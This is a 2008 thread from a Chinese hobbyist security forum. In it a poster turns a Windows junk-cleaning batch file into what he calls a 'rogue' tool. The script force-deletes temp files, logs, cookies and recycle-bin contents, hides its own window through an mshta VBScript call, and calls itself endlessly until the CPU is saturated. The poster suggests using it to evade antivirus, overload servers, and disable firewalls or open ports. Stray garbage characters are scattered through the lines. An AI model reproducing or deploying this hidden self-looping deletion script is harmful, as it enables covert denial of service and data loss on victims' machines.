Board logo

标题: 【原创】再谈垃圾清除的批处理和其流氓运用! [打印本页]

作者: 平湖秋月    时间: 2008-9-13 23:51     标题: 【原创】再谈垃圾清除的批处理和其流氓运用!

大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序    说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!% J* U( S6 J9 Y  T7 T/ R
a.bat源代码如下:* n6 A* V# {) f
7 a$ E2 ]- K( x- Z- {7 l

- Z. w8 Z& T: R3 E, g5 f. |  J===可以直接保存改名a.bat=====================+ I' P+ x7 p+ n8 T! [/ E
@echo off  M1 Z8 S! d7 C; I/ ^+ w" u- a9 t
echo 正在清除系统垃圾文件,请稍等......
) Y# ^. D# g' I@del /f /s /q %systemdrive%\*.tmp * i7 a; ^1 m& ~3 q- i3 e
@del /f /s /q %systemdrive%\*._mp
3 m6 T6 h. J, ~' N4 [- q6 l9 p& G@del /f /s /q %systemdrive%\*.log
  i! I+ @* Y: v@del /f /s /q %systemdrive%\*.gid + D* ^" |( v4 a3 U9 t
@del /f /s /q %systemdrive%\*.chk
5 b. i0 C" W3 }  L@del /f /s /q %systemdrive%\*.old " c& j; M8 W5 z- ]  w' Q7 y. z
@del /f /s /q %systemdrive%\recycled\*.* 1 ^- K+ @: I( I+ H# B2 M7 K
@del /f /s /q %windir%\*.bak
/ {' u! P4 q1 P+ p# Y@del /f /s /q %windir%\prefetch\*.* ) W- c, W( R( b
@rd /s /q %windir%\temp & md %windir%\temp ; X3 @3 c) n9 B9 I7 h2 q
@del /f /q %userprofile%\cookies\*.* 1 w. v* f% W+ A- h
@del /f /q %userprofile%\recent\*.*
; V4 R- ~+ `. V@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
3 k) Z! @+ {8 h@del /f /s /q "%userprofile%\Local Settings\Temp\*.*" % ^- z$ K; y  h" R, d' l5 Z: K5 w
@del /f /s /q "%userprofile%\recent\*.*" ! C& y, f) Q: s
echo 清除系统LJ完成!

$ R3 \5 y  ^3 q/ S$ T0 E其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:" e& D& f/ s( s' t1 }% ?" Z

* V, }/ v6 v8 k) V" w( @===可以直接保存改名为a.bat(一定要是a.bat哦具体说明原因你应该明白吧======- \4 I6 K6 h* r4 y& k' K
@echo off5 @+ u  F8 K( z) `8 {  `8 F7 u2 T
if "%1" == "h" goto begin
- ~9 }" A5 d. P) j2 O7 gmshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit% u5 q' ?6 \, i' e# W) {4 m
:begin
' j( N, U8 _! o6 qecho 正在清除系统垃圾文件,请稍等......
8 [6 Z7 }1 ^0 v@@del /f /s /q %systemdrive%\*.tmp ) Z- T6 S) v8 T% p
@del /f /s /q %systemdrive%\*._mp
7 r. `9 E$ O7 _" J0 O& j3 [4 i9 J@del /f /s /q %systemdrive%\*.log
# J7 b8 s9 {! L+ C, I" H4 ~/ C6 C8 E@del /f /s /q %systemdrive%\*.gid ' z' M2 i9 @9 p" |$ n7 r
@del /f /s /q %systemdrive%\*.chk
- Q" @" |! K( x/ K@del /f /s /q %systemdrive%\*.old , r( K/ l/ ~, J  Z' U% ], j& q
@del /f /s /q %systemdrive%\recycled\*.* ! s: d0 [2 m" M5 U
@del /f /s /q %windir%\*.bak " D4 J1 i$ d, N" c. y
@del /f /s /q %windir%\prefetch\*.*
- @, g6 q- J/ ], m0 R5 }@rd /s /q %windir%\temp & md %windir%\temp 9 F5 G& n1 L; P, @6 {$ F
@del /f /q %userprofile%\cookies\*.* " _( m7 h1 P, Q' z# Y
@del /f /q %userprofile%\recent\*.*
- A" R6 u, w  e9 n" W@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
" k" U7 d! ^! }- u@del /f /s /q "%userprofile%\Local Settings\Temp\*.*" 5 z8 c- O3 i) C/ C
@del /f /s /q "%userprofile%\recent\*.*"
3 V1 {  Q/ F/ S) b% p( xecho 清除系统LJ完成!
$ I- l8 W7 e( Q" C7 xcall a.bat
6 N1 i' R5 a4 F7 p# J/ d) o
运行看看!什么效果?
. ^9 L) z( Q# Z& H5 r对话框消失了!打开任务管理器查看显示CPU运用:100%    看进程里面cmd.exe占用CPU:99     本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!, }3 {  p& n( v) E  \& J. S

% |& w: U& r" J' }# T: g. K* f3 y你说,我们可以利用这个BAT做些什么:
0 K0 g3 H7 Q* x  R$ _# `+ G* H, m
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
. i) ~- c6 \% m1 G; n2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
  ^9 m7 T- P4 g# B; O3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月

作者: 上帝的爱    时间: 2008-9-14 05:03

想法非常不错
作者: 柔肠寸断    时间: 2008-9-14 17:34

打个岔,流氓的应用,呵呵
作者: 柔肠寸断    时间: 2008-9-14 17:38

现在来正经的回答下问题:
9 I3 V. u7 s. d' s' I2 Z+ q% j1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了
  P3 j5 g8 L5 X8 W, @
7 b$ i% C7 o; p4 e5 R2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者: 问道小生    时间: 2008-9-14 19:03

其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~. w; `0 g, T) S
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者: 平湖秋月    时间: 2008-9-15 21:43

楼上的你们说的都有道理 理论上是成立的 我有时间试试看




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2